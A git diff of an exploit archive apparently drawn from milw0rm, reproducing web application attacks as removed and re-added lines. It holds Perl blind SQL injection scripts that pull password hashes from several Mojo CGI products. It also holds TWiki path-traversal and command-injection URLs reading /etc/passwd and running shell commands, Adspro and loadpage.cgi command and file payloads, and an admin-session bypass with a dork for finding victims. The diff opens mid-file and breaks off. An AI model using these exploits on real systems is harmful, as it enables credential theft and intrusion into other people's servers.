"[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $cat_a = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "tourterms.pdf"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " #################### Viva IslaMe Viva IslaMe ################\n"; + print " # MojoClassifieds Blind SQL Injection Exploit #\n"; + print " # (mojoClassified.cgi mojo ) #\n"; + print " # Author: Mr.SQL #\n"; + print " # EMAIL : SQL@HOTMAIL.IT #\n"; + print " # #\n"; + print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; + print " # #\n"; + print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; + print " # :: ALwHeD :: milw0rm :: #\n"; + print " # #\n"; + print " # <<>> MuSliMs HaCkErS <<>> #\n"; + print " # #\n"; + print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; + print " # #\n"; + print " # Usage : perl test.pl host #\n"; + print " # Example: perl test.pl www.host.com / -d 10 #\n"; + print " # Options: #\n"; + print " # -d valid cat_a value #\n"; + print " #############################################################\n"; + exit; +} +my $host = $ARGV[0]; +my $cat_a = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "p=s", "d=i"); +print "[~] Exploiting...\n"; +if($options{"b"}) +{ + $mojo = $options{"b"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $cat_a = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "tourterms.pdf"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-21] diff --git a/platforms/cgi/webapps/6109.pl b/platforms/cgi/webapps/6109.pl index 7f9ad3d42..535f43ea9 100755 --- a/platforms/cgi/webapps/6109.pl +++ b/platforms/cgi/webapps/6109.pl @@ -1,96 +1,96 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " #################### Viva IslaMe Viva IslaMe ################\n"; - print " # MojoPersonals Blind SQL Injection Exploit #\n"; - print " # (mojoClassified.cgi mojo ) #\n"; - print " # Author: Mr.SQL #\n"; - print " # EMAIL : SQL@HOTMAIL.IT #\n"; - print " # #\n"; - print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; - print " # #\n"; - print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; - print " # :: ALwHeD :: milw0rm :: #\n"; - print " # #\n"; - print " # <<>> MuSliMs HaCkErS <<>> #\n"; - print " # #\n"; - print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; - print " # #\n"; - print " # Usage : perl test.pl host #\n"; - print " # Example: perl test.pl www.host.com / -d 10 #\n"; - print " # Options: #\n"; - print " # -d valid cat value #\n"; - print " #############################################################\n"; - exit; -} -my $host = $ARGV[0]; -my $cat = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "p=s", "d=i"); -print "[~] Exploiting...\n"; -if($options{"b"}) -{ - $mojo = $options{"b"}; -} -syswrite(STDOUT, "[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $cat, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $cat, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $cat = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat=".$cat." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "tourterms.pdf"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " #################### Viva IslaMe Viva IslaMe ################\n"; + print " # MojoPersonals Blind SQL Injection Exploit #\n"; + print " # (mojoClassified.cgi mojo ) #\n"; + print " # Author: Mr.SQL #\n"; + print " # EMAIL : SQL@HOTMAIL.IT #\n"; + print " # #\n"; + print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; + print " # #\n"; + print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; + print " # :: ALwHeD :: milw0rm :: #\n"; + print " # #\n"; + print " # <<>> MuSliMs HaCkErS <<>> #\n"; + print " # #\n"; + print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; + print " # #\n"; + print " # Usage : perl test.pl host #\n"; + print " # Example: perl test.pl www.host.com / -d 10 #\n"; + print " # Options: #\n"; + print " # -d valid cat value #\n"; + print " #############################################################\n"; + exit; +} +my $host = $ARGV[0]; +my $cat = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "p=s", "d=i"); +print "[~] Exploiting...\n"; +if($options{"b"}) +{ + $mojo = $options{"b"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $cat, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $cat, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $cat = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat=".$cat." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "tourterms.pdf"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-21] diff --git a/platforms/cgi/webapps/6110.pl b/platforms/cgi/webapps/6110.pl index 35d1a3746..c7ec1ea03 100755 --- a/platforms/cgi/webapps/6110.pl +++ b/platforms/cgi/webapps/6110.pl @@ -1,96 +1,96 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " #################### Viva IslaMe Viva IslaMe ################\n"; - print " # MojoJobs Blind SQL Injection Exploit #\n"; - print " # (mojoJobs.cgi mojo ) #\n"; - print " # Author: Mr.SQL #\n"; - print " # EMAIL : SQL@HOTMAIL.IT #\n"; - print " # #\n"; - print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; - print " # #\n"; - print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; - print " # :: ALwHeD :: milw0rm :: #\n"; - print " # #\n"; - print " # <<>> MuSliMs HaCkErS <<>> #\n"; - print " # #\n"; - print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; - print " # #\n"; - print " # Usage : perl test.pl host #\n"; - print " # Example: perl test.pl www.host.com / -d 10 #\n"; - print " # Options: #\n"; - print " # -d valid cat_a value #\n"; - print " #############################################################\n"; - exit; -} -my $host = $ARGV[0]; -my $cat_a = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "p=s", "d=i"); -print "[~] Exploiting...\n"; -if($options{"b"}) -{ - $mojo = $options{"b"}; -} -syswrite(STDOUT, "[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $cat_a = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host."mojoJobs.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "tourterms.pdf"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " #################### Viva IslaMe Viva IslaMe ################\n"; + print " # MojoJobs Blind SQL Injection Exploit #\n"; + print " # (mojoJobs.cgi mojo ) #\n"; + print " # Author: Mr.SQL #\n"; + print " # EMAIL : SQL@HOTMAIL.IT #\n"; + print " # #\n"; + print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; + print " # #\n"; + print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; + print " # :: ALwHeD :: milw0rm :: #\n"; + print " # #\n"; + print " # <<>> MuSliMs HaCkErS <<>> #\n"; + print " # #\n"; + print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; + print " # #\n"; + print " # Usage : perl test.pl host #\n"; + print " # Example: perl test.pl www.host.com / -d 10 #\n"; + print " # Options: #\n"; + print " # -d valid cat_a value #\n"; + print " #############################################################\n"; + exit; +} +my $host = $ARGV[0]; +my $cat_a = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "p=s", "d=i"); +print "[~] Exploiting...\n"; +if($options{"b"}) +{ + $mojo = $options{"b"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $cat_a = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host."mojoJobs.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "tourterms.pdf"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-21] diff --git a/platforms/cgi/webapps/6111.pl b/platforms/cgi/webapps/6111.pl index 849436bc0..6470fbd04 100755 --- a/platforms/cgi/webapps/6111.pl +++ b/platforms/cgi/webapps/6111.pl @@ -1,96 +1,96 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " #################### Viva IslaMe Viva IslaMe ################\n"; - print " # MojoAuto Blind SQL Injection Exploit #\n"; - print " # (mojoAuto.cgi mojo ) #\n"; - print " # Author: Mr.SQL #\n"; - print " # EMAIL : SQL@HOTMAIL.IT #\n"; - print " # #\n"; - print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; - print " # #\n"; - print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; - print " # :: ALwHeD :: milw0rm :: #\n"; - print " # #\n"; - print " # <<>> MuSliMs HaCkErS <<>> #\n"; - print " # #\n"; - print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; - print " # #\n"; - print " # Usage : perl test.pl host #\n"; - print " # Example: perl test.pl www.host.com / -d 10 #\n"; - print " # Options: #\n"; - print " # -d valid cat_a value #\n"; - print " #############################################################\n"; - exit; -} -my $host = $ARGV[0]; -my $cat_a = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "p=s", "d=i"); -print "[~] Exploiting...\n"; -if($options{"b"}) -{ - $mojo = $options{"b"}; -} -syswrite(STDOUT, "[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $cat_a = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host."mojoAuto.cgi?mojo=1&action=browse&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "tourterms.pdf"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " #################### Viva IslaMe Viva IslaMe ################\n"; + print " # MojoAuto Blind SQL Injection Exploit #\n"; + print " # (mojoAuto.cgi mojo ) #\n"; + print " # Author: Mr.SQL #\n"; + print " # EMAIL : SQL@HOTMAIL.IT #\n"; + print " # #\n"; + print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; + print " # #\n"; + print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; + print " # :: ALwHeD :: milw0rm :: #\n"; + print " # #\n"; + print " # <<>> MuSliMs HaCkErS <<>> #\n"; + print " # #\n"; + print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; + print " # #\n"; + print " # Usage : perl test.pl host #\n"; + print " # Example: perl test.pl www.host.com / -d 10 #\n"; + print " # Options: #\n"; + print " # -d valid cat_a value #\n"; + print " #############################################################\n"; + exit; +} +my $host = $ARGV[0]; +my $cat_a = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "p=s", "d=i"); +print "[~] Exploiting...\n"; +if($options{"b"}) +{ + $mojo = $options{"b"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $cat_a, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $cat_a = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host."mojoAuto.cgi?mojo=1&action=browse&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "tourterms.pdf"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-21] diff --git a/platforms/cgi/webapps/6269.txt b/platforms/cgi/webapps/6269.txt index 3dccb1dd8..37c6ac9da 100755 --- a/platforms/cgi/webapps/6269.txt +++ b/platforms/cgi/webapps/6269.txt @@ -1,61 +1,61 @@ -################################################################################################################ -# # -# TWiki 4.2.0 File Disclosure Vuln (configure) # -# # -################################################################################################################ - - "We're brazilian newbies!!! :p" - Th1nk3r - -Info ----------------------------------------------------------------------------------------------------------------- -Classe : Input Validation Error -Remote : Yes -Local : No -Date : 05/08/2008 -Credits : Th1nk3r (cnwfhguohrugbo / gmail.com) -Greetz : w4n73d h4ck3r, Vitor, Vonnatur, FuradordeSyS, B470-Killer, M4v3rick. - -Description ----------------------------------------------------------------------------------------------------------------- - TWiki version 4.2.0 (I haven't tested other versions) is vulnerable to a File Disclosure. It's only possible -to exploit the bug if you can access the "/bin/configure" script. -Otherwise, you can not exploit this bug. - Vulnerable code of "/bin/configure" script: - - if( $action eq 'image' ) { - # SMELL: this call is correct, but causes a perl error - # on some versions of CGI.pm - # print $query->header(-type => $query->param('type')); - # So use this instead: - print 'Content-type: '.$query->param('type')."\n\n"; - if( open(F, 'logos/'.$query->param('image' ))) { - local $/ = undef; - print ; - close(F); - } - exit 0; -} - - The bug is in the open() function. The file is set by visitor, and there is no protection added -by the programmer. - Note that "$query->param('type')" can be set by the visitor. Therefore, you'll set it to "text/plain". - - - -Exploit ----------------------------------------------------------------------------------------------------------------- - - To exploit the bug, you just need set the "image" variable to the path of file you wish to view. - The file will be revealed if you have permission to view it. - - By example, to show the "/etc/passwd" file content, go to : - http://www.examplo.org/{PATH}/bin/configure?action=image;image=../../../../../../etc/passwd;type=text/plain - - - -Solution ----------------------------------------------------------------------------------------------------------------- - Read "http://twiki.org/cgi-bin/view/TWiki/TWikiInstallationGuide", Basic Installation, topic 8, for -more information of how to protect your "configure" script. - -# milw0rm.com [2008-08-19] +################################################################################################################ +# # +# TWiki 4.2.0 File Disclosure Vuln (configure) # +# # +################################################################################################################ + + "We're brazilian newbies!!! :p" - Th1nk3r + +Info +---------------------------------------------------------------------------------------------------------------- +Classe : Input Validation Error +Remote : Yes +Local : No +Date : 05/08/2008 +Credits : Th1nk3r (cnwfhguohrugbo / gmail.com) +Greetz : w4n73d h4ck3r, Vitor, Vonnatur, FuradordeSyS, B470-Killer, M4v3rick. + +Description +---------------------------------------------------------------------------------------------------------------- + TWiki version 4.2.0 (I haven't tested other versions) is vulnerable to a File Disclosure. It's only possible +to exploit the bug if you can access the "/bin/configure" script. +Otherwise, you can not exploit this bug. + Vulnerable code of "/bin/configure" script: + + if( $action eq 'image' ) { + # SMELL: this call is correct, but causes a perl error + # on some versions of CGI.pm + # print $query->header(-type => $query->param('type')); + # So use this instead: + print 'Content-type: '.$query->param('type')."\n\n"; + if( open(F, 'logos/'.$query->param('image' ))) { + local $/ = undef; + print ; + close(F); + } + exit 0; +} + + The bug is in the open() function. The file is set by visitor, and there is no protection added +by the programmer. + Note that "$query->param('type')" can be set by the visitor. Therefore, you'll set it to "text/plain". + + + +Exploit +---------------------------------------------------------------------------------------------------------------- + + To exploit the bug, you just need set the "image" variable to the path of file you wish to view. + The file will be revealed if you have permission to view it. + + By example, to show the "/etc/passwd" file content, go to : + http://www.examplo.org/{PATH}/bin/configure?action=image;image=../../../../../../etc/passwd;type=text/plain + + + +Solution +---------------------------------------------------------------------------------------------------------------- + Read "http://twiki.org/cgi-bin/view/TWiki/TWikiInstallationGuide", Basic Installation, topic 8, for +more information of how to protect your "configure" script. + +# milw0rm.com [2008-08-19] diff --git a/platforms/cgi/webapps/642.pl b/platforms/cgi/webapps/642.pl index 5185ec439..2b54e5187 100755 --- a/platforms/cgi/webapps/642.pl +++ b/platforms/cgi/webapps/642.pl @@ -224,6 +224,6 @@ print "[Server issued an empty response. Perhaps you entered a wrong command?]\n } else { die "Couldn't connect to server. Error message follows:\n" . $res->status_line . "\n"; } -} - -# milw0rm.com [2004-11-20] +} + +# milw0rm.com [2004-11-20] diff --git a/platforms/cgi/webapps/6509.txt b/platforms/cgi/webapps/6509.txt index d3d109100..1af3eac5f 100755 --- a/platforms/cgi/webapps/6509.txt +++ b/platforms/cgi/webapps/6509.txt @@ -1,33 +1,33 @@ -#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------# -#-----------TWiki Remote Code Execution <= 4.2.2--------------------# - -# ----------developers site: http://www.twiki.org-------------------# -# ----------CVE Id(s) : CVE-2008-3195--------------------------# - -# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights - -The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion. - -According to TWiki's documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;) - -Vulnerable code: - -if( $action eq 'image' ) { - # SMELL: this call is correct, but causes a perl error - - # on some versions of CGI.pm - # print $query->header(-type => $query->param('type')); - # So use this instead: - print 'Content-type: '.$query->param('type')."\n\n"; - - if( open(F, 'logos/'.$query->param('image' ))) { - local $/ = undef; - print ; - close(F); - } - -http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain - -http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain - -# milw0rm.com [2008-09-21] +#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------# +#-----------TWiki Remote Code Execution <= 4.2.2--------------------# + +# ----------developers site: http://www.twiki.org-------------------# +# ----------CVE Id(s) : CVE-2008-3195--------------------------# + +# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights + +The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion. + +According to TWiki's documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;) + +Vulnerable code: + +if( $action eq 'image' ) { + # SMELL: this call is correct, but causes a perl error + + # on some versions of CGI.pm + # print $query->header(-type => $query->param('type')); + # So use this instead: + print 'Content-type: '.$query->param('type')."\n\n"; + + if( open(F, 'logos/'.$query->param('image' ))) { + local $/ = undef; + print ; + close(F); + } + +http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain + +http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain + +# milw0rm.com [2008-09-21] diff --git a/platforms/cgi/webapps/659.txt b/platforms/cgi/webapps/659.txt index 1d5702439..528b3e504 100755 --- a/platforms/cgi/webapps/659.txt +++ b/platforms/cgi/webapps/659.txt @@ -1,5 +1,5 @@ Example: -http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html - -# milw0rm.com [2004-11-25] +http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html + +# milw0rm.com [2004-11-25] diff --git a/platforms/cgi/webapps/6771.txt b/platforms/cgi/webapps/6771.txt index dc2eef975..9ecc71663 100755 --- a/platforms/cgi/webapps/6771.txt +++ b/platforms/cgi/webapps/6771.txt @@ -1,43 +1,43 @@ -******************************************************* -*Exploit discovered by SecVuln from http://secvuln.com* -*Come join our clan! * -*contact secvuln@secvuln.com * -******************************************************* - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Author == SecVuln -Version == 4.02 -Software == Calendars for the web by great hill corporation -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Calendars for the web has a vulnerability in the administration page. -The page saves the past session, so that anyone navigating to the page has -admin access. - -Exploit: - -Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe - -After attack: -target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 - -Example: -target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 - -!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -how to fix: set time out for login to five minutes ! -!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! - -A Google query can find a couple pages of victims: inurl:calweb/calweb.exe - -Further hacks: if they disable the timeout you can still log in right after -they log out... You could probaly do something with that -Also the 0 at the ending is the administrator (super user) id. - -///////////////////////////////////////////////////////////////// -I take no responsability for the misuse of the information.////// -Author will not be held liable for any damages ////// -COME CHECK MY SITE OUT WWW.SECVULN.COM ////// -//////////////////////////////////////////////////////////////// - -# milw0rm.com [2008-10-16] +******************************************************* +*Exploit discovered by SecVuln from http://secvuln.com* +*Come join our clan! * +*contact secvuln@secvuln.com * +******************************************************* + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Author == SecVuln +Version == 4.02 +Software == Calendars for the web by great hill corporation +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Calendars for the web has a vulnerability in the administration page. +The page saves the past session, so that anyone navigating to the page has +admin access. + +Exploit: + +Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe + +After attack: +target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 + +Example: +target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 + +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +how to fix: set time out for login to five minutes ! +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + +A Google query can find a couple pages of victims: inurl:calweb/calweb.exe + +Further hacks: if they disable the timeout you can still log in right after +they log out... You could probaly do something with that +Also the 0 at the ending is the administrator (super user) id. + +///////////////////////////////////////////////////////////////// +I take no responsability for the misuse of the information.////// +Author will not be held liable for any damages ////// +COME CHECK MY SITE OUT WWW.SECVULN.COM ////// +//////////////////////////////////////////////////////////////// + +# milw0rm.com [2008-10-16] diff --git a/platforms/cgi/webapps/6845.txt b/platforms/cgi/webapps/6845.txt index bd965809d..b497cca43 100755 --- a/platforms/cgi/webapps/6845.txt +++ b/platforms/cgi/webapps/6845.txt @@ -1,13 +1,13 @@ -<~\Adspro Script Remote Command Execution/~> - -[~]Author S0l1D -[~]Script Adspro -[~]Homepage http://adspro.mhfmedia.com/index.shtm - -** -~\Exploit/~ - -http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_top.htm|id| -http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_login.htm|id| - -# milw0rm.com [2008-10-26] +<~\Adspro Script Remote Command Execution/~> + +[~]Author S0l1D +[~]Script Adspro +[~]Homepage http://adspro.mhfmedia.com/index.shtm + +** +~\Exploit/~ + +http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_top.htm|id| +http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_login.htm|id| + +# milw0rm.com [2008-10-26] diff --git a/platforms/cgi/webapps/6864.txt b/platforms/cgi/webapps/6864.txt index 52fa54923..a39ea6740 100755 --- a/platforms/cgi/webapps/6864.txt +++ b/platforms/cgi/webapps/6864.txt @@ -1,23 +1,23 @@ - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| 